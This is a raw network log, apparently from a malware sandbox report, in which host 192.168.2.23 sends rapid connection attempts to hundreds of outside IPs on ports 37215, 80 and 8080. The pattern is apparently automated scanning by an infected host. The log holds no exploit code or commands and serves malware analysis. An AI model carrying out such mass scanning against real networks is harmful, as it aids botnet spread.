                                                            Feb 14, 2024 09:27:41.869247913 CET4067537215192.168.2.23157.220.57.54
                                                            Feb 14, 2024 09:27:41.869251013 CET4067537215192.168.2.23157.56.239.243
                                                            Feb 14, 2024 09:27:41.869277954 CET4067537215192.168.2.23157.85.72.171
                                                            Feb 14, 2024 09:27:41.869302988 CET4067537215192.168.2.23157.92.60.117
                                                            Feb 14, 2024 09:27:41.869303942 CET4067537215192.168.2.23157.23.200.136
                                                            Feb 14, 2024 09:27:41.869324923 CET4067537215192.168.2.23157.190.137.54
                                                            Feb 14, 2024 09:27:41.869338036 CET4067537215192.168.2.23157.105.228.158
                                                            Feb 14, 2024 09:27:41.869400978 CET4067537215192.168.2.23157.246.0.100
                                                            Feb 14, 2024 09:27:41.869437933 CET4067537215192.168.2.23157.132.223.200
                                                            Feb 14, 2024 09:27:41.869440079 CET4067537215192.168.2.23157.188.193.153
                                                            Feb 14, 2024 09:27:41.869465113 CET4067537215192.168.2.23157.116.29.99
                                                            Feb 14, 2024 09:27:41.869465113 CET4067537215192.168.2.23157.246.124.220
                                                            Feb 14, 2024 09:27:41.869499922 CET4067537215192.168.2.23157.139.235.222
                                                            Feb 14, 2024 09:27:41.869503021 CET4067537215192.168.2.23157.52.67.245
                                                            Feb 14, 2024 09:27:41.869503975 CET4067537215192.168.2.23157.13.202.29
                                                            Feb 14, 2024 09:27:41.869522095 CET4067537215192.168.2.23157.3.105.165
                                                            Feb 14, 2024 09:27:41.869524002 CET4067537215192.168.2.23157.121.61.18
                                                            Feb 14, 2024 09:27:41.869528055 CET4067537215192.168.2.23157.227.158.92
                                                            Feb 14, 2024 09:27:41.869528055 CET4067537215192.168.2.23157.43.114.214
                                                            Feb 14, 2024 09:27:41.869566917 CET4067537215192.168.2.23157.223.13.69
                                                            Feb 14, 2024 09:27:41.869586945 CET4067537215192.168.2.23157.157.196.241
                                                            Feb 14, 2024 09:27:41.869625092 CET4067537215192.168.2.23157.180.183.106
                                                            Feb 14, 2024 09:27:41.869649887 CET4067537215192.168.2.23157.58.63.188
                                                            Feb 14, 2024 09:27:41.869649887 CET4067537215192.168.2.23157.155.186.41
                                                            Feb 14, 2024 09:27:41.869673014 CET4067537215192.168.2.23157.46.53.15
                                                            Feb 14, 2024 09:27:41.869673967 CET4067537215192.168.2.23157.222.126.182
                                                            Feb 14, 2024 09:27:41.869678974 CET4067537215192.168.2.23157.226.158.90
                                                            Feb 14, 2024 09:27:41.869740963 CET4067537215192.168.2.23157.124.100.36
                                                            Feb 14, 2024 09:27:41.869740963 CET4067537215192.168.2.23157.142.118.172
                                                            Feb 14, 2024 09:27:41.869756937 CET4067537215192.168.2.23157.243.95.1
                                                            Feb 14, 2024 09:27:41.869760036 CET4067537215192.168.2.23157.200.23.46
                                                            Feb 14, 2024 09:27:41.869760990 CET4067537215192.168.2.23157.197.44.57
                                                            Feb 14, 2024 09:27:41.869760036 CET4067537215192.168.2.23157.69.0.238
                                                            Feb 14, 2024 09:27:41.869793892 CET4067537215192.168.2.23157.156.121.196
                                                            Feb 14, 2024 09:27:41.869796038 CET4067537215192.168.2.23157.92.72.208
                                                            Feb 14, 2024 09:27:41.869806051 CET4067537215192.168.2.23157.250.156.142
                                                            Feb 14, 2024 09:27:41.869836092 CET4067537215192.168.2.23157.174.142.154
                                                            Feb 14, 2024 09:27:41.869905949 CET4067537215192.168.2.23157.40.168.169
                                                            Feb 14, 2024 09:27:41.869905949 CET4067537215192.168.2.23157.212.228.190
                                                            Feb 14, 2024 09:27:41.869913101 CET4067537215192.168.2.23157.32.253.196
                                                            Feb 14, 2024 09:27:41.869913101 CET4067537215192.168.2.23157.144.211.204
                                                            Feb 14, 2024 09:27:41.869944096 CET4067537215192.168.2.23157.107.219.131
                                                            Feb 14, 2024 09:27:41.869951010 CET4067537215192.168.2.23157.197.46.223
                                                            Feb 14, 2024 09:27:41.869988918 CET4067537215192.168.2.23157.244.255.167
                                                            Feb 14, 2024 09:27:41.870033979 CET4067537215192.168.2.23157.159.106.216
                                                            Feb 14, 2024 09:27:41.870033979 CET4067537215192.168.2.23157.173.175.189
                                                            Feb 14, 2024 09:27:41.870096922 CET4067537215192.168.2.23157.41.143.228
                                                            Feb 14, 2024 09:27:41.870109081 CET4067537215192.168.2.23157.204.149.231
                                                            Feb 14, 2024 09:27:41.870119095 CET4067537215192.168.2.23157.21.100.0
                                                            Feb 14, 2024 09:27:41.870120049 CET4067537215192.168.2.23157.0.46.183
                                                            Feb 14, 2024 09:27:41.870127916 CET4067537215192.168.2.23157.56.245.245
                                                            Feb 14, 2024 09:27:41.870157003 CET4067537215192.168.2.23157.40.178.43
                                                            Feb 14, 2024 09:27:41.870160103 CET4067537215192.168.2.23157.211.20.174
                                                            Feb 14, 2024 09:27:41.870208979 CET4067537215192.168.2.23157.251.46.128
                                                            Feb 14, 2024 09:27:41.870233059 CET4067537215192.168.2.23157.59.140.141
                                                            Feb 14, 2024 09:27:41.870234013 CET4067537215192.168.2.23157.75.111.144
                                                            Feb 14, 2024 09:27:41.870234013 CET4067537215192.168.2.23157.40.206.93
                                                            Feb 14, 2024 09:27:41.870261908 CET4067537215192.168.2.23157.160.174.189
                                                            Feb 14, 2024 09:27:41.870275974 CET4067537215192.168.2.23157.183.242.151
                                                            Feb 14, 2024 09:27:41.870330095 CET4067537215192.168.2.23157.165.112.106
                                                            Feb 14, 2024 09:27:41.870331049 CET4067537215192.168.2.23157.173.247.215
                                                            Feb 14, 2024 09:27:41.870331049 CET4067537215192.168.2.23157.134.76.200
                                                            Feb 14, 2024 09:27:41.870333910 CET4067537215192.168.2.23157.211.200.75
                                                            Feb 14, 2024 09:27:41.870407104 CET4067537215192.168.2.23157.175.129.17
                                                            Feb 14, 2024 09:27:41.870412111 CET4067537215192.168.2.23157.158.239.63
                                                            Feb 14, 2024 09:27:41.870414972 CET4067537215192.168.2.23157.17.75.63
                                                            Feb 14, 2024 09:27:41.870433092 CET4067537215192.168.2.23157.105.130.195
                                                            Feb 14, 2024 09:27:41.870436907 CET4067537215192.168.2.23157.123.82.111
                                                            Feb 14, 2024 09:27:41.870462894 CET4067537215192.168.2.23157.125.218.102
                                                            Feb 14, 2024 09:27:41.870496988 CET4067537215192.168.2.23157.216.66.70
                                                            Feb 14, 2024 09:27:41.870511055 CET4067537215192.168.2.23157.122.203.57
                                                            Feb 14, 2024 09:27:41.870526075 CET4067537215192.168.2.23157.103.161.108
                                                            Feb 14, 2024 09:27:41.870527029 CET4067537215192.168.2.23157.57.117.45
                                                            Feb 14, 2024 09:27:41.870529890 CET4067537215192.168.2.23157.242.251.189
                                                            Feb 14, 2024 09:27:41.870567083 CET4067537215192.168.2.23157.121.183.83
                                                            Feb 14, 2024 09:27:41.870579958 CET4067537215192.168.2.23157.231.67.62
                                                            Feb 14, 2024 09:27:41.870593071 CET4067537215192.168.2.23157.137.49.170
                                                            Feb 14, 2024 09:27:41.870626926 CET4067537215192.168.2.23157.57.102.235
                                                            Feb 14, 2024 09:27:41.870631933 CET4067537215192.168.2.23157.225.167.87
                                                            Feb 14, 2024 09:27:41.870657921 CET4067537215192.168.2.23157.2.14.95
                                                            Feb 14, 2024 09:27:41.870691061 CET4067537215192.168.2.23157.79.61.100
                                                            Feb 14, 2024 09:27:41.870696068 CET4067537215192.168.2.23157.224.0.54
                                                            Feb 14, 2024 09:27:41.870722055 CET4067537215192.168.2.23157.6.138.162
                                                            Feb 14, 2024 09:27:41.870729923 CET4067537215192.168.2.23157.252.163.171
                                                            Feb 14, 2024 09:27:41.870748997 CET4067537215192.168.2.23157.98.64.101
                                                            Feb 14, 2024 09:27:41.870779991 CET4067537215192.168.2.23157.84.44.60
                                                            Feb 14, 2024 09:27:41.870805025 CET4067537215192.168.2.23157.0.40.46
                                                            Feb 14, 2024 09:27:41.870810986 CET4067537215192.168.2.23157.90.241.42
                                                            Feb 14, 2024 09:27:41.870810986 CET4067537215192.168.2.23157.166.104.207
                                                            Feb 14, 2024 09:27:41.870845079 CET4067537215192.168.2.23157.135.132.25
                                                            Feb 14, 2024 09:27:41.870845079 CET4067537215192.168.2.23157.44.124.68
                                                            Feb 14, 2024 09:27:41.870897055 CET4067537215192.168.2.23157.52.25.112
                                                            Feb 14, 2024 09:27:41.870902061 CET4067537215192.168.2.23157.74.117.197
                                                            Feb 14, 2024 09:27:41.870902061 CET4067537215192.168.2.23157.84.23.233
                                                            Feb 14, 2024 09:27:41.870910883 CET4067537215192.168.2.23157.207.24.173
                                                            Feb 14, 2024 09:27:41.870934010 CET4067537215192.168.2.23157.225.63.23
                                                            Feb 14, 2024 09:27:41.870954037 CET4067537215192.168.2.23157.198.126.34
                                                            Feb 14, 2024 09:27:41.870954037 CET4067537215192.168.2.23157.25.132.141
                                                            Feb 14, 2024 09:27:41.870966911 CET4067537215192.168.2.23157.89.255.247
                                                            Feb 14, 2024 09:27:41.954391956 CET4067280192.168.2.2388.65.143.217
                                                            Feb 14, 2024 09:27:41.954391956 CET4067280192.168.2.2388.70.162.17
                                                            Feb 14, 2024 09:27:41.954416990 CET4067280192.168.2.2388.199.186.221
                                                            Feb 14, 2024 09:27:41.954418898 CET4067280192.168.2.2388.195.139.82
                                                            Feb 14, 2024 09:27:41.954427004 CET4067280192.168.2.2388.137.241.48
                                                            Feb 14, 2024 09:27:41.954430103 CET4067280192.168.2.2388.194.235.244
                                                            Feb 14, 2024 09:27:41.954493046 CET4067280192.168.2.2388.31.208.36
                                                            Feb 14, 2024 09:27:41.954493046 CET4067280192.168.2.2388.90.201.103
                                                            Feb 14, 2024 09:27:41.954493046 CET4067280192.168.2.2388.210.102.249
                                                            Feb 14, 2024 09:27:41.954516888 CET4067280192.168.2.2388.104.84.217
                                                            Feb 14, 2024 09:27:41.954530954 CET4067280192.168.2.2388.173.159.161
                                                            Feb 14, 2024 09:27:41.954541922 CET4067280192.168.2.2388.242.51.127
                                                            Feb 14, 2024 09:27:41.954571962 CET4067280192.168.2.2388.235.132.230
                                                            Feb 14, 2024 09:27:41.954598904 CET4067280192.168.2.2388.252.215.95
                                                            Feb 14, 2024 09:27:41.954598904 CET4067280192.168.2.2388.68.169.153
                                                            Feb 14, 2024 09:27:41.954602957 CET4067280192.168.2.2388.133.226.33
                                                            Feb 14, 2024 09:27:41.954628944 CET4067280192.168.2.2388.192.69.122
                                                            Feb 14, 2024 09:27:41.954691887 CET4067280192.168.2.2388.111.193.134
                                                            Feb 14, 2024 09:27:41.954694033 CET4067280192.168.2.2388.21.127.184
                                                            Feb 14, 2024 09:27:41.954735041 CET4067280192.168.2.2388.129.235.247
                                                            Feb 14, 2024 09:27:41.954772949 CET4067280192.168.2.2388.230.54.199
                                                            Feb 14, 2024 09:27:41.954798937 CET4067280192.168.2.2388.57.202.59
                                                            Feb 14, 2024 09:27:41.954818010 CET4067280192.168.2.2388.69.216.60
                                                            Feb 14, 2024 09:27:41.954818010 CET4067280192.168.2.2388.210.52.29
                                                            Feb 14, 2024 09:27:41.954818010 CET4067280192.168.2.2388.136.228.177
                                                            Feb 14, 2024 09:27:41.954853058 CET4067280192.168.2.2388.3.78.182
                                                            Feb 14, 2024 09:27:41.954869032 CET4067280192.168.2.2388.16.1.154
                                                            Feb 14, 2024 09:27:41.954888105 CET4067280192.168.2.2388.250.30.79
                                                            Feb 14, 2024 09:27:41.954901934 CET4067280192.168.2.2388.227.162.135
                                                            Feb 14, 2024 09:27:41.954901934 CET4067280192.168.2.2388.44.102.234
                                                            Feb 14, 2024 09:27:41.954938889 CET4067280192.168.2.2388.102.168.156
                                                            Feb 14, 2024 09:27:41.954989910 CET4067280192.168.2.2388.61.22.233
                                                            Feb 14, 2024 09:27:41.954989910 CET4067280192.168.2.2388.141.225.51
                                                            Feb 14, 2024 09:27:41.954989910 CET4067280192.168.2.2388.190.252.199
                                                            Feb 14, 2024 09:27:41.954992056 CET4067280192.168.2.2388.240.230.104
                                                            Feb 14, 2024 09:27:41.955044031 CET4067280192.168.2.2388.169.66.246
                                                            Feb 14, 2024 09:27:41.955070972 CET4067280192.168.2.2388.246.12.31
                                                            Feb 14, 2024 09:27:41.955127954 CET4067280192.168.2.2388.166.6.41
                                                            Feb 14, 2024 09:27:41.955137968 CET4067280192.168.2.2388.221.64.21
                                                            Feb 14, 2024 09:27:41.955149889 CET4067280192.168.2.2388.227.80.192
                                                            Feb 14, 2024 09:27:41.955149889 CET4067280192.168.2.2388.131.132.54
                                                            Feb 14, 2024 09:27:41.955177069 CET4067280192.168.2.2388.17.192.143
                                                            Feb 14, 2024 09:27:41.955177069 CET4067280192.168.2.2388.157.112.126
                                                            Feb 14, 2024 09:27:41.955194950 CET4067280192.168.2.2388.212.193.4
                                                            Feb 14, 2024 09:27:41.955209970 CET4067280192.168.2.2388.51.216.138
                                                            Feb 14, 2024 09:27:41.955209970 CET4067280192.168.2.2388.138.50.150
                                                            Feb 14, 2024 09:27:41.955210924 CET4067280192.168.2.2388.46.184.97
                                                            Feb 14, 2024 09:27:41.955212116 CET4067280192.168.2.2388.111.1.71
                                                            Feb 14, 2024 09:27:41.955218077 CET4067280192.168.2.2388.17.152.95
                                                            Feb 14, 2024 09:27:41.955245972 CET4067280192.168.2.2388.131.82.42
                                                            Feb 14, 2024 09:27:41.955280066 CET4067280192.168.2.2388.116.229.64
                                                            Feb 14, 2024 09:27:41.955280066 CET4067280192.168.2.2388.135.54.174
                                                            Feb 14, 2024 09:27:41.955281019 CET4067280192.168.2.2388.232.208.44
                                                            Feb 14, 2024 09:27:41.955321074 CET4067280192.168.2.2388.236.33.255
                                                            Feb 14, 2024 09:27:41.955323935 CET4067280192.168.2.2388.2.40.165
                                                            Feb 14, 2024 09:27:41.955336094 CET4067280192.168.2.2388.6.16.243
                                                            Feb 14, 2024 09:27:41.955343008 CET4067280192.168.2.2388.56.19.90
                                                            Feb 14, 2024 09:27:41.955362082 CET4067280192.168.2.2388.214.77.42
                                                            Feb 14, 2024 09:27:41.955379009 CET4067280192.168.2.2388.228.132.126
                                                            Feb 14, 2024 09:27:41.955399990 CET4067280192.168.2.2388.7.24.129
                                                            Feb 14, 2024 09:27:41.955430984 CET4067280192.168.2.2388.62.146.205
                                                            Feb 14, 2024 09:27:41.955432892 CET4067280192.168.2.2388.63.154.75
                                                            Feb 14, 2024 09:27:41.955444098 CET4067280192.168.2.2388.30.197.100
                                                            Feb 14, 2024 09:27:41.955465078 CET4067280192.168.2.2388.250.99.238
                                                            Feb 14, 2024 09:27:41.955465078 CET4067280192.168.2.2388.220.251.5
                                                            Feb 14, 2024 09:27:41.955502033 CET4067280192.168.2.2388.174.204.64
                                                            Feb 14, 2024 09:27:41.955547094 CET4067280192.168.2.2388.135.31.196
                                                            Feb 14, 2024 09:27:41.955559015 CET4067280192.168.2.2388.252.100.96
                                                            Feb 14, 2024 09:27:41.955568075 CET4067280192.168.2.2388.59.226.3
                                                            Feb 14, 2024 09:27:41.955568075 CET4067280192.168.2.2388.238.1.41
                                                            Feb 14, 2024 09:27:41.955568075 CET4067280192.168.2.2388.130.84.215
                                                            Feb 14, 2024 09:27:41.955595970 CET4067280192.168.2.2388.190.242.70
                                                            Feb 14, 2024 09:27:41.955614090 CET4067280192.168.2.2388.161.198.59
                                                            Feb 14, 2024 09:27:41.955625057 CET4067280192.168.2.2388.56.222.53
                                                            Feb 14, 2024 09:27:41.955626011 CET4067280192.168.2.2388.83.0.101
                                                            Feb 14, 2024 09:27:41.955677986 CET4067280192.168.2.2388.226.178.222
                                                            Feb 14, 2024 09:27:41.955724955 CET4067280192.168.2.2388.158.250.73
                                                            Feb 14, 2024 09:27:41.955724955 CET4067280192.168.2.2388.246.157.127
                                                            Feb 14, 2024 09:27:41.955743074 CET4067280192.168.2.2388.131.186.148
                                                            Feb 14, 2024 09:27:41.955780029 CET4067280192.168.2.2388.81.69.32
                                                            Feb 14, 2024 09:27:41.955780029 CET4067280192.168.2.2388.224.137.86
                                                            Feb 14, 2024 09:27:41.955780983 CET4067280192.168.2.2388.177.182.177
                                                            Feb 14, 2024 09:27:41.955786943 CET4067280192.168.2.2388.167.15.70
                                                            Feb 14, 2024 09:27:41.955794096 CET4067280192.168.2.2388.153.198.52
                                                            Feb 14, 2024 09:27:41.955813885 CET4067280192.168.2.2388.7.113.28
                                                            Feb 14, 2024 09:27:41.955816031 CET4067280192.168.2.2388.226.169.73
                                                            Feb 14, 2024 09:27:41.955838919 CET4067280192.168.2.2388.117.44.130
                                                            Feb 14, 2024 09:27:41.955883980 CET4067280192.168.2.2388.227.67.2
                                                            Feb 14, 2024 09:27:41.955919027 CET4067280192.168.2.2388.87.159.53
                                                            Feb 14, 2024 09:27:41.955949068 CET4067280192.168.2.2388.16.61.50
                                                            Feb 14, 2024 09:27:41.955960989 CET4067280192.168.2.2388.181.244.164
                                                            Feb 14, 2024 09:27:41.955987930 CET4067280192.168.2.2388.188.4.29
                                                            Feb 14, 2024 09:27:41.955991983 CET4067280192.168.2.2388.213.188.23
                                                            Feb 14, 2024 09:27:41.955991983 CET4067280192.168.2.2388.33.180.81
                                                            Feb 14, 2024 09:27:41.956048965 CET4067280192.168.2.2388.194.178.20
                                                            Feb 14, 2024 09:27:41.956052065 CET4067280192.168.2.2388.42.28.244
                                                            Feb 14, 2024 09:27:41.956051111 CET4067280192.168.2.2388.248.216.176
                                                            Feb 14, 2024 09:27:41.956067085 CET4067280192.168.2.2388.216.228.18
                                                            Feb 14, 2024 09:27:41.956108093 CET4067280192.168.2.2388.154.101.239
                                                            Feb 14, 2024 09:27:41.956108093 CET4067280192.168.2.2388.44.246.241
                                                            Feb 14, 2024 09:27:41.956121922 CET4067280192.168.2.2388.63.14.179
                                                            Feb 14, 2024 09:27:41.956155062 CET4067280192.168.2.2388.57.231.32
                                                            Feb 14, 2024 09:27:41.956172943 CET4067280192.168.2.2388.139.121.79
                                                            Feb 14, 2024 09:27:41.956175089 CET4067280192.168.2.2388.12.145.59
                                                            Feb 14, 2024 09:27:41.956202030 CET4067280192.168.2.2388.86.153.166
                                                            Feb 14, 2024 09:27:41.956218958 CET4067280192.168.2.2388.102.90.24
                                                            Feb 14, 2024 09:27:41.956221104 CET4067280192.168.2.2388.126.159.148
                                                            Feb 14, 2024 09:27:41.956240892 CET4067280192.168.2.2388.233.186.59
                                                            Feb 14, 2024 09:27:41.956290007 CET4067280192.168.2.2388.149.145.85
                                                            Feb 14, 2024 09:27:41.956290007 CET4067280192.168.2.2388.234.199.2
                                                            Feb 14, 2024 09:27:41.956295013 CET4067280192.168.2.2388.141.184.107
                                                            Feb 14, 2024 09:27:41.956330061 CET4067280192.168.2.2388.98.209.134
                                                            Feb 14, 2024 09:27:41.956370115 CET4067280192.168.2.2388.13.146.73
                                                            Feb 14, 2024 09:27:41.956371069 CET4067280192.168.2.2388.199.177.211
                                                            Feb 14, 2024 09:27:41.956370115 CET4067280192.168.2.2388.211.206.61
                                                            Feb 14, 2024 09:27:41.956376076 CET4067280192.168.2.2388.64.33.138
                                                            Feb 14, 2024 09:27:41.956377983 CET4067280192.168.2.2388.205.118.77
                                                            Feb 14, 2024 09:27:41.956393957 CET4067280192.168.2.2388.185.3.206
                                                            Feb 14, 2024 09:27:41.956444979 CET4067280192.168.2.2388.165.48.146
                                                            Feb 14, 2024 09:27:41.956465960 CET4067280192.168.2.2388.65.85.23
                                                            Feb 14, 2024 09:27:41.956471920 CET4067280192.168.2.2388.184.158.84
                                                            Feb 14, 2024 09:27:41.956471920 CET4067280192.168.2.2388.249.247.142
                                                            Feb 14, 2024 09:27:41.956475019 CET4067280192.168.2.2388.50.136.95
                                                            Feb 14, 2024 09:27:41.956487894 CET4067280192.168.2.2388.117.80.13
                                                            Feb 14, 2024 09:27:41.956520081 CET4067280192.168.2.2388.237.144.71
                                                            Feb 14, 2024 09:27:41.956526995 CET4067280192.168.2.2388.254.159.239
                                                            Feb 14, 2024 09:27:41.956559896 CET4067280192.168.2.2388.198.190.202
                                                            Feb 14, 2024 09:27:41.956566095 CET4067280192.168.2.2388.76.56.194
                                                            Feb 14, 2024 09:27:41.956573963 CET4067280192.168.2.2388.25.107.25
                                                            Feb 14, 2024 09:27:41.956573963 CET4067280192.168.2.2388.53.37.221
                                                            Feb 14, 2024 09:27:41.956605911 CET4067280192.168.2.2388.225.144.165
                                                            Feb 14, 2024 09:27:41.956619024 CET4067280192.168.2.2388.67.35.82
                                                            Feb 14, 2024 09:27:41.956672907 CET4067280192.168.2.2388.92.211.49
                                                            Feb 14, 2024 09:27:41.956696033 CET4067280192.168.2.2388.108.25.187
                                                            Feb 14, 2024 09:27:41.956736088 CET4067280192.168.2.2388.240.9.45
                                                            Feb 14, 2024 09:27:41.956748962 CET4067280192.168.2.2388.215.173.208
                                                            Feb 14, 2024 09:27:41.956770897 CET4067280192.168.2.2388.39.147.110
                                                            Feb 14, 2024 09:27:41.956770897 CET4067280192.168.2.2388.171.169.223
                                                            Feb 14, 2024 09:27:41.956775904 CET4067280192.168.2.2388.173.134.201
                                                            Feb 14, 2024 09:27:41.956800938 CET4067280192.168.2.2388.248.128.203
                                                            Feb 14, 2024 09:27:41.956804037 CET4067280192.168.2.2388.209.162.102
                                                            Feb 14, 2024 09:27:41.956804037 CET4067280192.168.2.2388.77.106.11
                                                            Feb 14, 2024 09:27:41.956809044 CET4067280192.168.2.2388.119.51.71
                                                            Feb 14, 2024 09:27:41.956809044 CET4067280192.168.2.2388.205.16.139
                                                            Feb 14, 2024 09:27:41.956835985 CET4067280192.168.2.2388.95.77.159
                                                            Feb 14, 2024 09:27:41.956835985 CET4067280192.168.2.2388.195.155.222
                                                            Feb 14, 2024 09:27:41.956859112 CET4067280192.168.2.2388.73.234.92
                                                            Feb 14, 2024 09:27:41.956881046 CET4067280192.168.2.2388.8.143.223
                                                            Feb 14, 2024 09:27:41.956897020 CET4067280192.168.2.2388.6.6.52
                                                            Feb 14, 2024 09:27:41.956927061 CET4067280192.168.2.2388.6.63.41
                                                            Feb 14, 2024 09:27:41.956933022 CET4067280192.168.2.2388.32.142.91
                                                            Feb 14, 2024 09:27:41.956958055 CET4067280192.168.2.2388.22.192.90
                                                            Feb 14, 2024 09:27:41.956958055 CET4067280192.168.2.2388.225.120.74
                                                            Feb 14, 2024 09:27:41.956969023 CET4067280192.168.2.2388.31.147.7
                                                            Feb 14, 2024 09:27:41.957022905 CET4067280192.168.2.2388.207.168.127
                                                            Feb 14, 2024 09:27:41.957055092 CET4067280192.168.2.2388.90.135.75
                                                            Feb 14, 2024 09:27:41.957056999 CET4067280192.168.2.2388.12.111.23
                                                            Feb 14, 2024 09:27:41.957056999 CET4067280192.168.2.2388.77.188.40
                                                            Feb 14, 2024 09:27:41.957060099 CET4067280192.168.2.2388.37.118.88
                                                            Feb 14, 2024 09:27:41.957087994 CET4067280192.168.2.2388.20.32.52
                                                            Feb 14, 2024 09:27:42.002439022 CET406848080192.168.2.2362.3.126.70
                                                            Feb 14, 2024 09:27:42.002439022 CET406848080192.168.2.2385.149.71.40
                                                            Feb 14, 2024 09:27:42.002439022 CET406848080192.168.2.2394.74.69.36
                                                            Feb 14, 2024 09:27:42.002444983 CET406848080192.168.2.2395.33.73.37
                                                            Feb 14, 2024 09:27:42.002444983 CET406848080192.168.2.2362.101.238.177
                                                            Feb 14, 2024 09:27:42.002444983 CET406848080192.168.2.2331.18.142.172
                                                            Feb 14, 2024 09:27:42.002460003 CET406848080192.168.2.2385.205.137.183
                                                            Feb 14, 2024 09:27:42.002466917 CET406848080192.168.2.2331.242.110.237
                                                            Feb 14, 2024 09:27:42.002480030 CET406848080192.168.2.2362.36.164.175
                                                            Feb 14, 2024 09:27:42.002480030 CET406848080192.168.2.2394.34.243.223
                                                            Feb 14, 2024 09:27:42.002480030 CET406848080192.168.2.2331.160.217.111
                                                            Feb 14, 2024 09:27:42.002480030 CET406848080192.168.2.2362.167.164.105
                                                            Feb 14, 2024 09:27:42.002494097 CET406848080192.168.2.2394.37.149.13
                                                            Feb 14, 2024 09:27:42.002494097 CET406848080192.168.2.2394.172.156.39
                                                            Feb 14, 2024 09:27:42.002494097 CET406848080192.168.2.2331.186.106.86
                                                            Feb 14, 2024 09:27:42.002494097 CET406848080192.168.2.2331.143.226.3
                                                            Feb 14, 2024 09:27:42.002494097 CET406848080192.168.2.2385.159.191.136
                                                            Feb 14, 2024 09:27:42.002501011 CET406848080192.168.2.2395.248.244.99
                                                            Feb 14, 2024 09:27:42.002501011 CET406848080192.168.2.2362.8.95.130
                                                            Feb 14, 2024 09:27:42.002501011 CET406848080192.168.2.2362.160.86.77
                                                            Feb 14, 2024 09:27:42.002501011 CET406848080192.168.2.2385.62.6.34
                                                            Feb 14, 2024 09:27:42.002501011 CET406848080192.168.2.2385.198.182.26
                                                            Feb 14, 2024 09:27:42.002501011 CET406848080192.168.2.2395.239.77.14
                                                            Feb 14, 2024 09:27:42.002501011 CET406848080192.168.2.2385.247.123.173
                                                            Feb 14, 2024 09:27:42.002501011 CET406848080192.168.2.2331.37.22.1
                                                            Feb 14, 2024 09:27:42.002504110 CET406848080192.168.2.2362.160.241.130
                                                            Feb 14, 2024 09:27:42.002504110 CET406848080192.168.2.2394.141.125.244
                                                            Feb 14, 2024 09:27:42.002504110 CET406848080192.168.2.2331.212.54.16
                                                            Feb 14, 2024 09:27:42.002540112 CET406848080192.168.2.2331.228.116.83
                                                            Feb 14, 2024 09:27:42.002540112 CET406848080192.168.2.2394.74.94.8
                                                            Feb 14, 2024 09:27:42.002540112 CET406848080192.168.2.2394.194.15.243
                                                            Feb 14, 2024 09:27:42.002540112 CET406848080192.168.2.2385.191.156.130
                                                            Feb 14, 2024 09:27:42.002551079 CET406848080192.168.2.2394.83.9.104
                                                            Feb 14, 2024 09:27:42.002551079 CET406848080192.168.2.2394.177.236.68
                                                            Feb 14, 2024 09:27:42.002551079 CET406848080192.168.2.2362.251.67.49
                                                            Feb 14, 2024 09:27:42.002552986 CET406848080192.168.2.2385.209.135.110
                                                            Feb 14, 2024 09:27:42.002558947 CET406848080192.168.2.2395.21.190.19
                                                            Feb 14, 2024 09:27:42.002562046 CET406848080192.168.2.2395.115.190.130
                                                            Feb 14, 2024 09:27:42.002562046 CET406848080192.168.2.2385.86.232.230
                                                            Feb 14, 2024 09:27:42.002593994 CET406848080192.168.2.2394.109.238.155
                                                            Feb 14, 2024 09:27:42.002597094 CET406848080192.168.2.2362.42.78.70
                                                            Feb 14, 2024 09:27:42.002605915 CET406848080192.168.2.2385.28.54.127
                                                            Feb 14, 2024 09:27:42.002605915 CET406848080192.168.2.2395.195.19.38
                                                            Feb 14, 2024 09:27:42.002605915 CET406848080192.168.2.2362.148.120.27
                                                            Feb 14, 2024 09:27:42.002605915 CET406848080192.168.2.2394.201.94.61
                                                            Feb 14, 2024 09:27:42.002605915 CET406848080192.168.2.2385.138.28.26
                                                            Feb 14, 2024 09:27:42.002605915 CET406848080192.168.2.2362.163.110.173
                                                            Feb 14, 2024 09:27:42.002605915 CET406848080192.168.2.2331.234.130.74
                                                            Feb 14, 2024 09:27:42.002605915 CET406848080192.168.2.2395.198.70.56
                                                            Feb 14, 2024 09:27:42.002613068 CET406848080192.168.2.2385.66.125.237
                                                            Feb 14, 2024 09:27:42.002621889 CET406848080192.168.2.2395.50.37.133
                                                            Feb 14, 2024 09:27:42.002624989 CET406848080192.168.2.2394.238.91.150
                                                            Feb 14, 2024 09:27:42.002640009 CET406848080192.168.2.2395.79.251.216
                                                            Feb 14, 2024 09:27:42.002645016 CET406848080192.168.2.2394.196.161.107
                                                            Feb 14, 2024 09:27:42.002650023 CET406848080192.168.2.2395.177.49.156
                                                            Feb 14, 2024 09:27:42.002655983 CET406848080192.168.2.2394.29.234.73
                                                            Feb 14, 2024 09:27:42.002655983 CET406848080192.168.2.2395.35.173.92
                                                            Feb 14, 2024 09:27:42.002660036 CET406848080192.168.2.2394.206.156.15
                                                            Feb 14, 2024 09:27:42.002665997 CET406848080192.168.2.2331.107.163.147
                                                            Feb 14, 2024 09:27:42.002665997 CET406848080192.168.2.2362.156.102.188
                                                            Feb 14, 2024 09:27:42.002665997 CET406848080192.168.2.2395.130.184.48
                                                            Feb 14, 2024 09:27:42.002665997 CET406848080192.168.2.2394.227.0.87
                                                            Feb 14, 2024 09:27:42.002672911 CET406848080192.168.2.2362.235.177.15
                                                            Feb 14, 2024 09:27:42.002672911 CET406848080192.168.2.2362.107.118.134
                                                            Feb 14, 2024 09:27:42.002676964 CET406848080192.168.2.2395.220.119.73
                                                            Feb 14, 2024 09:27:42.002685070 CET406848080192.168.2.2385.225.39.183
                                                            Feb 14, 2024 09:27:42.002686024 CET406848080192.168.2.2385.216.63.50
                                                            Feb 14, 2024 09:27:42.002686024 CET406848080192.168.2.2395.175.55.17
                                                            Feb 14, 2024 09:27:42.002686024 CET406848080192.168.2.2385.54.203.219
                                                            Feb 14, 2024 09:27:42.002686024 CET406848080192.168.2.2362.54.175.134
                                                            Feb 14, 2024 09:27:42.002686024 CET406848080192.168.2.2395.146.85.107
                                                            Feb 14, 2024 09:27:42.002686024 CET406848080192.168.2.2331.158.116.210
                                                            Feb 14, 2024 09:27:42.002686977 CET406848080192.168.2.2331.32.220.228
                                                            Feb 14, 2024 09:27:42.002686977 CET406848080192.168.2.2362.83.11.218
                                                            Feb 14, 2024 09:27:42.002686977 CET406848080192.168.2.2362.174.246.199
                                                            Feb 14, 2024 09:27:42.002686977 CET406848080192.168.2.2362.239.150.33
                                                            Feb 14, 2024 09:27:42.002691031 CET406848080192.168.2.2395.92.197.101
                                                            Feb 14, 2024 09:27:42.002686977 CET406848080192.168.2.2385.100.45.31
                                                            Feb 14, 2024 09:27:42.002686977 CET406848080192.168.2.2385.199.54.38
